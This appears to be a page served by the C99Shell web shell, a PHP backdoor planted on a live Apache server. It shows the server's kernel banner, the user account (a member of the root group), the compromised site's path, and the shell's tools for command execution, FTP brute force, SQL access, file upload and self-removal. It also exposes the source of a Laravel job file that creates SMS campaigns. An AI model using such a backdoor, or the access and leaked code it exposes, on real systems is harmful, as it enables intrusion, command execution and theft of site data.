!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/app/Jobs/   drwxr-xr-x
Free 28.3 GB of 117.98 GB (23.99%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     XLSXCampaignCreateJob.php (2.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Jobs;

use 
App\Http\Controllers\Customer\CampaignController;
use 
Illuminate\Bus\Queueable;
use 
Illuminate\Contracts\Queue\ShouldBeUnique;
use 
Illuminate\Contracts\Queue\ShouldQueue;
use 
Illuminate\Foundation\Bus\Dispatchable;
use 
Illuminate\Http\Request;
use 
Illuminate\Queue\InteractsWithQueue;
use 
Illuminate\Queue\SerializesModels;
use 
App\Models\Campaign;


class 
XLSXCampaignCreateJob implements ShouldQueue
{
    use 
DispatchableInteractsWithQueueQueueableSerializesModels;


    public 
$group_id;
    public 
$customer_id;
    public 
$campaign_id;
    public 
$from;
    public 
$body;
    public 
$start_date;
    public 
$end_date;
    public 
$start_time;
    public 
$end_time;

    public function 
__construct($from,$customer_id,$group_id$campaign_id$body,$start_date$end_date$start_time$end_time)
    {
        
$this->from=$from;
        
$this->customer_id=$customer_id;
        
$this->group_id=$group_id;
        
$this->campaign_id=$campaign_id;
        
$this->body=$body;
        
$this->start_date $start_date;
        
$this->end_date $end_date;
        
$this->start_time $start_time;
        
$this->end_time $end_time;

    }
    
/**
     * Execute the job.
     *
     * @return void
     */
    
public function handle()
    {
        
$campaign Campaign::where('id',$this->campaign_id)->first();
        
$request_data['regenerate']=true;
        
$request_data['recipient_type']='group';
        
$request_data['group_id']=[$this->group_id];
        
$request_data['pre_generated_from']=$this->from;
        
$request_data['customer_id']=$this->customer_id;
        
$request_data['campaign_id']=$this->campaign_id;
        
$request_data['from_devices']=json_decode($campaign->sim_info);
        
$request_data['template_body']=$this->body;
        
$request_data['start_date']=$this->start_date;
        
$request_data['end_date']=$this->end_date;
        
$request_data['start_time']=$this->start_time;
        
$request_data['end_time']=$this->end_time;

        
$customRequest Request::create(route('customer.campaign.store'), 'POST'$request_data);

        
$store= new CampaignController();
        
$store->store($customRequest);

    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--